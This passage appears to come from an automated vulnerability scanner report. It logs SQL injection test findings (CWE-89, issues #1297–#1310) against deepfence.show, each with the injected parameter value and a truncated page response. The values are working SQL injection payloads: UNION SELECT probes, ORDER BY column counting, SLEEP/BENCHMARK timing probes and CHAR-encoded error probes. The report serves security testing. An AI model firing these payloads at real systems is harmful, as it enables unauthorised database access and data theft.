href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1297\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RLIKE (SELECT (CASE WHEN (4346=4347) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1298\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1299\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1300\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1301\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1302\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1303\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1304\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# -1 UNION SELECT 1 INTO @,@,\n@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1305\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1306\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1307\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1308\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1309\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1310\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 